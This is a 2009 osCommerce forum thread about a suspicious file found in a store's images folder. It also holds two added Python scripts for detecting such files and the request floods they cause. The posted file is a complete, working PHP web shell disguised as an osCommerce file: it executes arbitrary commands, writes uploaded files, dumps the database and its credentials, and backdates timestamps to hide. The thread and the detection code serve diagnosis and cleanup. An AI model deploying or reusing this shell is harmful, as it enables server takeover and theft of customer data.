blargman Posted January 21, 2009

What is this file for? I noticed a large amount of requests from the server's own IP to this file and it caused Apache to reach its max clients.

```php
<?php
/*
  $Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

define("OSCOMMERCE_FILENAME", 'shell.php');
define("SLASH", chr(92));
define("NL", chr(10));
define("CRNL", chr(13).chr(10));

$licence = "(UTEO84JE73JLL)";
if (!isset($_POST['K']) || $licence != $_POST['K']) {
  header("Status: 404 Not Found");
  header("HTTP/1.0 404 Not Found");
  $in = rand(10000000, 99999999);
  $fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2);
  if ($fp) {
    $name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']);
    $out = "GET ".$name." HTTP/1.1".CRNL;
    $out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL;
    $out .= "Connection: Close".CRNL.CRNL;
    fwrite($fp, $out);
    while (!feof($fp)) {
      $data2save .= fgets($fp, 128);
    }
    @fclose($fp);
    if (strstr($data2save, CRNL.CRNL)) {
      $data2save = substr(strstr($data2save, CRNL.CRNL), 4);
      $data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save);
      echo preg_replace("~^[\d\s]+$~mi", "", $data2save);
    }
  }
  die();
}

header("Expires: Mon, 26 Jul 1980 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Cache-Control: private");
header("Pragma: no-cache");
set_time_limit(99999999999);
ini_set('memory_limit', -1);
clearstatcache();

function dbc() {
  if (is_file("../includes/configure.php")) {
    @include ("../includes/configure.php");
  } else if (is_file("includes/configure.php")) {
    @include ("includes/configure.php");
  }
  if (isset($_POST['MYH'])) $MYH = $_POST['MYH'];
  else $MYH = DB_SERVER;
  if (isset($_POST['MYU'])) $MYU = $_POST['MYU'];
  else $MYU = DB_SERVER_USERNAME;
  if (isset($_POST['MYP'])) $MYP = $_POST['MYP'];
  else $MYP = DB_SERVER_PASSWORD;
  if (isset($_POST['MYD'])) $MYD = $_POST['MYD'];
  else $MYD = DB_DATABASE;
  $MYL = mysql_connect($MYH, $MYU, $MYP);
  mysql_select_db($MYD);
  return array($MYL, $MYH, $MYU, $MYP, $MYD);
}

if (isset($_POST['P'])) {
  die("A11");
} else if (isset($_POST['MYST'])) {
  list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
  $tables = "";
  $res = mysql_query("SHOW TABLES");
  while ($row = mysql_fetch_array($res)) {
    $resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL);
    $rowCounts = @mysql_fetch_array($resCounts);
    $tables .= "|:|".$row[0].":".$rowCounts[0].NL;
  }
  echo $tables;
  mysql_close($MYL);
  die("#done");
} else if (isset($_POST['MYSD'])) {
  list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
  $list = "";
  $res = mysql_query("SHOW DATABASES");
  while ($row = mysql_fetch_array($res)) {
    $list .= "|:|".$row[0].NL;
  }
  echo $list;
  mysql_close($MYL);
  die("#done");
} else if (isset($_POST['MYFR'])) {
  list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
  if (substr($_POST['MYC'], 0, 1) == 0) {
    $res = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL);
    $row = @mysql_fetch_array($res);
    echo $row[1].";".NL;
  }
  $res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL);
  if (@mysql_num_rows($res) > 0) {
    while (($row = @mysql_fetch_array($res))) {
      $keys = @implode("`, `", @array_keys($row));
      $values = @array_values($row);
      foreach($values as $k=>$v) {
        $values[$k] = mysql_escape_string($v);
      }
      $values = @implode("', '", $values);
      echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL;
    }
  }
  mysql_close($MYL);
  die("#done");
} else if (isset($_POST['MYINF'])) {
  $inf = dbc();
  unset($inf[0]);
  die(implode("|:|", $inf));
} else if (isset($_POST['E'])) {
  @exec($_POST['E'], $output, $retCode);
  die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output));
} else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])) {
  if (strlen($_POST['U']) == $_POST['US']) {
    ignore_user_abort(true);
    $fpSave = fopen($_POST['UF'], "w");
    fwrite($fpSave, base64_decode($_POST['U']));
    fclose($fpSave);
    ignore_user_abort(false);
  }
}

if (isset($_POST['T']) || isset($_POST['UF'])) {
  if (isset($_POST['UF'])) $f = $_POST['UF'];
  else $f = $_POST['T'];
  $t = array();
  $d = dir(".");
  $mt = 0;
  while (false !== ($e = $d->read())) {
    $nt = filemtime($e);
    if ($nt > $mt) $mt = $nt;
    if (preg_match("~table_background~", $e)) {
      $t[0][] = $nt;
    } else {
      $t[1][] = $nt;
    }
  }
  $d->close();
  if (count($t[0]) > 0) $tc = 0;
  else $tc = 1;
  sort($t[$tc]);
  if (count($t[$tc]) > 0) {
    @touch($f, $t[$tc][floor(count($t[$tc]) / 2)]);
    @touch("./", $mt);
  }
}
?>
```
Guest Posted January 21, 2009

It is not stock osc. The only reference to it I can find in Google seems to relate to Information Pages Unlimited.
blargman Posted January 21, 2009

Yeah, I'm not sure why that link even comes up. It's not even on the page. Doing just a search for the file comes up with a few oscommerce installs with it.
Guest Posted January 21, 2009

> Yeah, I'm not sure why that link even comes up. It's not even on the page. Doing just a search for the file comes up with a few oscommerce installs with it.

Grab a copy of the file so you have it backed up, and delete it from your website.
blargman Posted January 21, 2009

> Grab a copy of the file so you have it backed up, and delete it from your website.

I just 403'd it via htaccess for now. I'm actually just looking at this for someone else and know very little about oscommerce. I also noticed his images folder was completely open. If anyone does know what it is, it would be helpful, I just don't know oscommerce enough to know what it's there for. :\
Guest Posted January 22, 2009

Looks like a hack attempt. Seriously -- look at the file content. It's not like any "normal" osC files, really. chmod it to 000, or rename it and then chmod it to 000.

-jared
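One way to triage a web root for files like the one posted at the top of this thread (an added example, not part of the thread or of osCommerce): it flags PHP files in static-content directories, matches four constructs taken from the posted script, and compares ctime with mtime, because the script's last block uses `touch()` to set a file's modification time to the median of its neighbours. `STATIC_DIRS`, `triage` and `build_sample` are names assumed here, and the fixture is constructed, inert text.

```python
import os
import re
import time

# Constructs copied from the script posted in this thread: request data passed
# straight to exec(), a decoded upload written to disk, a socket back to the
# same host, and touch() with a computed timestamp.
INDICATORS = {
    "exec-from-request": re.compile(r"exec\s*\(\s*\$_(POST|GET|REQUEST)\["),
    "write-decoded-upload": re.compile(r"base64_decode\s*\(\s*\$_(POST|GET|REQUEST)\["),
    "socket-to-self": re.compile(r"fsockopen\s*\(\s*\$_SERVER\["),
    "mtime-reset": re.compile(r"touch\s*\(\s*\$\w+\s*,"),
}
STATIC_DIRS = {"images", "img", "uploads"}  # assumption: adjust to the site layout

def triage(webroot, max_skew=86400):
    """Return sorted [(relative_path, [reasons])] for suspicious PHP files."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        parts = os.path.relpath(dirpath, webroot).split(os.sep)
        in_static = bool(STATIC_DIRS.intersection(parts))
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", errors="replace") as fh:
                text = fh.read()
            reasons = [k for k, rx in INDICATORS.items() if rx.search(text)]
            if in_static:
                reasons.append("php-in-static-dir")
            st = os.stat(full)
            # On POSIX, touch() can backdate mtime but not the inode change time.
            if st.st_ctime - st.st_mtime > max_skew:
                reasons.append("mtime-older-than-ctime")
            if reasons:
                findings.append((os.path.relpath(full, webroot), sorted(reasons)))
    return sorted(findings)

def build_sample(root):
    """Constructed fixture: inert text (no <?php tag) with two lines from the thread."""
    os.makedirs(os.path.join(root, "images"))
    bad = os.path.join(root, "images", "sample.php")
    with open(bad, "w") as fh:
        fh.write("@exec($_POST['E'], $output, $retCode);\n"
                 "fwrite($fpSave, base64_decode($_POST['U']));\n")
    old = time.time() - 30 * 86400
    os.utime(bad, (old, old))  # backdate mtime by 30 days, as touch() would
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
```

Files restored from an archive or copied with preserved timestamps also show an mtime older than their ctime, so treat that reason as a lead to combine with the others.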
blargman Posted January 23, 2009

> looks like a hack attempt. Seriously -- look at the file content. It's not like any "normal" osC files, really. chmod it to 000, or rename it and then chmod it to 000. -jared

I kind of thought the same, only thing that made me think different was the person I'm looking at this for, that file has been there since they put the oscommerce install on the server from another. I just found the same thing on another machine doing the exact same thing. DoSing out the server. Just filling up the MaxClients of Apache. The fsockopen did look a bit suspicious to me. Though unfortunately I just don't know much about OsCommerce or really PHP for that matter. Can't seem to find a copy of Oscommerce 1.7 to verify file contents against. Anyone have a 1.7 install or the tarball to check if that should be in the images directory?
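The self-requests described in the first post can be picked out of an access log: in the posted script, a request without the expected `K` field makes it fetch a URL from its own host, either its own path with `shell.php` replaced by eight random digits plus `.jpg`, or its own path unchanged when the file carries another name. This added example (not from the thread; the log lines, IP addresses and `sample_dropper.php` are constructed, and the function names are assumptions) counts such GETs per minute.

```python
import re
from collections import Counter

# Common/combined log format: client ident user [time] "METHOD target proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# The posted script builds its decoy name as rand(10000000, 99999999) . ".jpg"
DECOY_RE = re.compile(r'/\d{8}\.jpg$')

def self_fetches(lines, server_ips):
    """Count GETs the server sent to itself, keyed by (minute, kind, path)."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, stamp, method, target, _status = m.groups()
        if client not in server_ips or method != "GET":
            continue
        path = target.split("?", 1)[0]
        if DECOY_RE.search(path):
            kind, path = "decoy-jpg", DECOY_RE.sub("/<8 digits>.jpg", path)
        elif path.lower().endswith(".php"):
            kind = "php-self-request"
        else:
            continue
        hits[(stamp[:17], kind, path)] += 1  # stamp[:17] is dd/Mon/yyyy:hh:mm
    return hits

def bursts(hits, threshold=3):
    """Buckets with at least `threshold` self-requests in one minute, busiest first."""
    return sorted(((n, key) for key, n in hits.items() if n >= threshold), reverse=True)

# Constructed sample: 203.0.113.10 stands in for the web server's own address.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Jan/2009:10:15:01 -0500] "GET /images/sample_dropper.php HTTP/1.1" 404 210',
    '203.0.113.10 - - [21/Jan/2009:10:15:01 -0500] "GET /images/sample_dropper.php HTTP/1.1" 404 210',
    '203.0.113.10 - - [21/Jan/2009:10:15:01 -0500] "GET /images/sample_dropper.php HTTP/1.1" 404 210',
    '203.0.113.10 - - [21/Jan/2009:10:15:02 -0500] "GET /images/sample_dropper.php HTTP/1.1" 404 210',
    '203.0.113.10 - - [21/Jan/2009:10:15:02 -0500] "GET /shop/images/48213377.jpg HTTP/1.1" 404 208',
    '203.0.113.10 - - [21/Jan/2009:10:16:00 -0500] "GET /index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for count, key in bursts(self_fetches(SAMPLE_LOG, {"203.0.113.10"})):
        print(count, *key)
```

A single self-request, such as the `/index.php` line in the sample, stays below the threshold; scheduled jobs and health checks produce those legitimately.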
Guest Posted January 23, 2009

1.7? 2.2 MS2 was released in July 2003, I don't know the release timeline before that...

-jared